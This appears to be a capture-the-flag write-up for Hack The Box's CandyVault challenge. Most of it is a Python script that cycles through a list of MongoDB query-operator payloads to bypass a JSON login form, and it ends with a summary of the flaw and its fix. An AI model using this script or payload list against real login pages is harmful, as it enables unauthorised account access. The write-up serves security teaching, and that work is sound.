
HackTheBox CandyVault Writeup

Explore the basics of cybersecurity in the CandyVault Challenge on Hack The Box. This very-easy-level Challenge introduces NoSQL (MongoDB) injection against a JSON login form — submitting a query-operator object such as `{"$ne": null}` where the server expects a plain string in order to bypass authentication — in a clear and accessible way, perfect for beginners.

import json
import os
import sys
from urllib.parse import urljoin

import requests
from requests.exceptions import ConnectionError

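def get_base_url():
    """Build the target's base URL from the single ``<ip:port>`` CLI argument.

    Returns:
        ``"http://<host>:<port>"`` (the challenge target is plain HTTP).

    Exits with status 1 after printing a usage line when the argument is
    missing, has no ``:`` separator, has an empty host, or carries a port
    that is not an integer in 1..65535. The original unpacked
    ``split(':')`` directly, which died with an unhandled ``ValueError`` on
    ``host`` alone or on a bracketed IPv6 literal such as ``[::1]:8080``.
    """
    usage = f"Usage: {sys.argv[0]} <ip:port>"
    if len(sys.argv) != 2:
        print(usage)
        sys.exit(1)
    # rpartition splits on the LAST ':' so any extra colons stay in the host
    # part (bracketed IPv6 literals).
    host, sep, port = sys.argv[1].rpartition(':')
    if not sep or not host or not port.isdigit() or not 0 < int(port) < 65536:
        print(usage)
        sys.exit(1)
    return f"http://{host}:{port}"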

# Resolved at import time: get_base_url() exits the process on a bad argument,
# so a mistyped target fails fast before any request is sent.
base_url = get_base_url()
login_url = f"{base_url}/login"
# The body is sent as JSON. That is what lets the payloads below carry nested
# objects (MongoDB operators) where the server expects a plain string.
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}
# One session for the whole run so any cookie set by the login response is
# reused when attempt_login() fetches the redirect target.
# NOTE(review): no timeout is configured on the session or on the calls that
# use it; a stalled target will hang the scan.
session = requests.Session()

# Candidate bodies for the JSON login. Each entry swaps the string a field
# normally holds for a MongoDB query-operator object ($ne, $regex, $exists,
# $gt, $in, $nin, $not, $type) or wraps the whole query in $or, so that if the
# server splices the values straight into its query the comparison matches a
# record regardless of the real credentials. attack() tries them in order and
# stops at the first one that gets past the login page.
# NOTE(review): a few entries nest an operator object inside "$in", and some
# put "$or" at the top level instead of under "email"/"password". Whether the
# target accepts those depends on how it assembles the query — presumably a
# rejected query comes back as an error response, which attack() simply
# counts as a failed attempt.
payloads = [
    {"email": {"$ne": None}, "password": "any_password"},  # email != null
    {"email": {"$exists": True}, "password": "any_password"},
    {"email": {"$regex": ".*"}, "password": "any_password"},  # any email
    {"email": {"$ne": ""}, "password": "any_password"},
    {"email": {"$gt": ""}, "password": "any_password"},  # any non-empty string
    {"email": {"$in": ["admin@example.com", {"$ne": None}]}, "password": "any_password"},  # operator nested in $in
    {"email": "", "password": {"$ne": None}},  # operator on the password side only
    {"email": {"$not": {"$eq": None}}, "password": "any_password"},
    {"email": "admin@example.com", "password": {"$ne": "nonexistent"}},
    {"email": {"$regex": "^a"}, "password": "any_password"},
    {"$or": [{"email": "admin@example.com"}, {"email": {"$ne": None}}], "password": "any_password"},  # top-level $or
    {"$or": [{"email": {"$regex": "^"}}, {"password": {"$ne": None}}]},
    {"email": {"$ne": None}, "password": {"$exists": True}},  # both fields bypassed
    {"email": {"$type": "string"}, "password": "any_password"},
    {"email": {"$regex": "^.*$"}, "password": {"$regex": "^.*$"}},
    {"email": {"$in": ["", "admin"]}, "password": {"$exists": True}},
    {"email": "admin@example.com", "password": {"$regex": "^.*"}},
    {"email": {"$regex": ".*"}, "password": {"$not": {"$eq": "nonexistent"}}},
    {"email": {"$exists": True}, "password": {"$exists": True}},
    {"email": {"$in": ["admin@example.com", "user@example.com", {"$ne": None}]}, "password": {"$regex": "^.*"}},
    {"email": {"$in": ["user@example.com", {"$ne": None}]}, "password": {"$ne": "nonexistent"}},
    {"email": {"$regex": "^.*@.*$"}, "password": {"$regex": "^.*$"}},  # anything that looks like an address
    {"email": {"$regex": "^admin"}, "password": {"$ne": "wrong_password"}},
    {"email": {"$regex": "^.*$"}, "password": {"$in": ["123456", {"$ne": "wrong_password"}]}},
    {"$or": [{"email": {"$exists": True}}, {"password": {"$exists": True}}]},
    {"email": {"$in": ["admin", "user", "root"]}, "password": {"$nin": ["wrong", "incorrect"]}},
    {"email": {"$regex": "^"}, "password": {"$not": {"$eq": "invalid"}}},
    {"email": {"$regex": "^.*$"}, "password": {"$exists": True, "$ne": "wrong"}},
    {"email": {"$regex": "^"}, "password": {"$regex": "^.*$"}},
]

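def attempt_login(payload):
    """POST one candidate body to the login endpoint and return the outcome.

    Args:
        payload: dict serialised as the JSON request body.

    Returns:
        ``(response, final_url)``. When the login answers with a redirect,
        the Location target is fetched with the same session and that
        second response is returned together with the resolved URL;
        otherwise the login response itself and ``None``. ``(None, None)``
        after ``max_retries`` consecutive connection failures or timeouts,
        and also when a redirect carries no Location header (the original
        raised AttributeError on ``None.startswith``).

    Notes:
        Every call carries a timeout; without one a stalled target hung the
        whole scan. The redirect target is resolved with ``urljoin`` so
        absolute-path, relative and absolute Locations all work (the
        original only handled a leading ``/``). A Location pointing at
        another host is followed as-is, same as before.
    """
    max_retries = 3
    timeout = 10  # seconds; generous for one login round-trip
    rendered = json.dumps(payload)
    for attempt in range(1, max_retries + 1):
        try:
            response = session.post(
                login_url, headers=headers, json=payload,
                allow_redirects=False, timeout=timeout,
            )
            if not response.is_redirect:
                return response, None
            location = response.headers.get("Location")
            if not location:
                print(f"Redirect without Location header for payload: {rendered}")
                return None, None
            final_url = urljoin(login_url, location)
            response = session.get(final_url, headers=headers, timeout=timeout)
            return response, final_url
        except (ConnectionError, requests.exceptions.Timeout) as e:
            # Same message and numbering as before; the last failure prints
            # "Retrying (3/3)" and then falls through to (None, None).
            print(f"Connection error: {e}. Retrying ({attempt}/{max_retries})...")
    return None, None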

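def attack():
    """Try each entry of ``payloads`` in order until one bypasses the login.

    A bypass is declared when a non-error response no longer contains the
    login-page banner. The status check is explicit: the original wrote
    ``if response and ...``, which only worked because
    ``requests.Response.__bool__`` is ``response.ok`` — without that, a
    4xx/5xx returned for a payload the server rejects (an error page also
    lacks the banner) would have been reported as a successful bypass.

    Stops at the first hit with ``break`` rather than ``return``, so the
    summary of successful payloads at the end is actually reachable (it was
    dead code before: the list was appended to and then the function
    returned). Side effects are prints only.
    """
    login_banner = "Log-in to open the doors to candy vault!"
    successful_payloads = []
    for payload in payloads:
        response, final_url = attempt_login(payload)
        rendered = json.dumps(payload)
        bypassed = (
            response is not None
            and response.ok
            and login_banner not in response.text
        )
        if bypassed:
            print(f"Success with payload: {rendered}")
            print("Flag or response:", response.text)
            successful_payloads.append(payload)
            break
        if final_url:
            # Redirected, but the page we landed on still shows the login form.
            print(f"Redirected with payload {rendered} to {final_url}")
        else:
            print(f"Attempt failed with payload: {rendered}")
    if successful_payloads:
        print("\nSuccessful Payloads Discovered:", json.dumps(successful_payloads, indent=2))
    else:
        print("No successful bypasses found.")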

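# Script entry point. Guarding it keeps an import of this module from firing
# requests at the target; note that base_url is still resolved (and the usage
# check still runs) at import time, since that assignment sits at module level.
if __name__ == "__main__":
    attack()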

I didn't bother narrowing the list down to the single payload that works: the script stops at the first one that gets a response without the login page, so whichever entry fires first is the one that prints the flag.

Summary

CandyVault is a very-easy-level challenge on Hack The Box built around a NoSQL injection in the login endpoint. Because the server accepts a JSON body and passes the `email` and `password` values into a MongoDB query, an attacker can submit a query-operator object such as `{"$ne": null}` instead of a string; the script above iterates over a list of such payloads and stops at the first one that no longer returns the login page, printing the flag. The underlying weakness is a missing type check on user input: the fix is to reject anything but plain strings for these fields (or validate the request body against a schema) before it reaches the query, and, more generally, never to let a client-supplied value act as a query operator.

This post is licensed under CC BY 4.0 by the author.